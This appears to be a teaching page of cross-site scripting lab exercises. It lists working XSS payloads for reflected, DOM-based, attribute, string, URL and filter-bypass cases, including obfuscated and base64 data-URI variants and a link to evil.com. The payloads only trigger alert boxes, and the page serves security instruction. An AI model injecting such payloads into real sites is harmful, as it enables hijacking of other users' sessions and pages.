XSS Demos

1. Reflected XSS Message: Pop up a box Solution <script>alert("Reflected XSS Vulnerability!");</script> Another Payload Error: please go to our <a href='http://evil.com'>our new page;</a> Note: XSS Auditor stops this attack in Chrome and Safari on the Mac, and something blocks it in Opera. It works in Firefox.

2. More Reflected XSS Demos

3. Stored XSS Demos

4. DOM-Based XSS Demos https://attack.samsclass.info/xss4.htm?message=hi https://attack.samsclass.info/xss4.htm?message=<script>alert('Hi')</script>

5. Tag Attribute Value Image Resizer Height: Width: Solutions 50%'><script>alert(1)</script> 50%' onclick='alert(1)

6. JavaScript String Variable a: Solutions '; alert(1); var b='

7. URL URL: Solutions javascript:alert(1); http://www.ccsf.edu' onclick='javascript:alert(1)

8. Blocking SCRIPT Tags Message: Solutions Third one works in Chrome! <object data="data:text/html,<script>alert(1)</script>"> <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="> <a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">Click here</a>

9. Obfuscation Message: Examples <script>alert(1);</script> <xml onreadystatechange=alert(1)> <input autofocus onfocus=alert(1)> <x onclick=alert(1) src=a>Click here</x> <script/anyjunk>alert(1);</script> <img/onerror="alert(1)"src=a> <img/anyjunk/onerror="alert(1)"src=a> <<script>alert(1);<</script> <script<{alert(1)}/></script> <script>a\u006cert(1);</script> <script>a\l\ert\(1\);</script> <img onerror=eval('al\u0065rt(1)') src=a>

10. eval Source Code <p id="demo">alert(1)</p> <p> <button onclick="myFunction()">Try it</button> <p> <script> function myFunction() { var str = document.getElementById("demo").innerHTML; var res = str.replace(/.*/, eval); document.getElementById("demo").innerHTML = res; } </script> Live Code alert(1) Try it